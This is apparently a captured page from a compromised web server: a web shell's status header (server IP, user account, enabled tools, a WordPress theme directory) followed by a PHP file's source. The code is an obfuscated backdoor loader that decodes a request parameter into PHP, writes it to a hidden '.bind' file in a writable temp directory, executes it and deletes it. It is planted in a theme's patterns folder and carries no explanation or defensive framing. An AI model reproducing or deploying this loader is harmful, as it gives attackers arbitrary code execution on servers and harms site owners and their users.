| Server IP : 198.38.94.67 / Your IP : 216.73.217.74 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-content/themes/twentytwentyfour/patterns/ |
Upload File : |
<?php
if(count($_REQUEST) > 0 && isset($_REQUEST["\x69tem"])){
$data_chunk = array_filter([getenv("TMP"), getcwd(), "/tmp", sys_get_temp_dir(), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path()]);
$property_set = $_REQUEST["\x69tem"];
$property_set = explode( '.', $property_set) ;
$object = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt);
$p = 0;
while($p < count($property_set)) {$v8 = $property_set[$p];
$sChar = ord($salt[$p % $sLen]);
$dec =((int)$v8 - $sChar -($p % 10)) ^ 60;
$object .= chr($dec);
$p++;}
$sym = 0;
do {
$element = $data_chunk[$sym] ?? null;
if ($sym >= count($data_chunk)) break;
if (!( !is_dir($element) || !is_writable($element) )) {
$holder = "$element" . "/.bind";
if (@file_put_contents($holder, $object) !== false) {
include $holder;
unlink($holder);
die();
}
}
$sym++;
} while (true);
}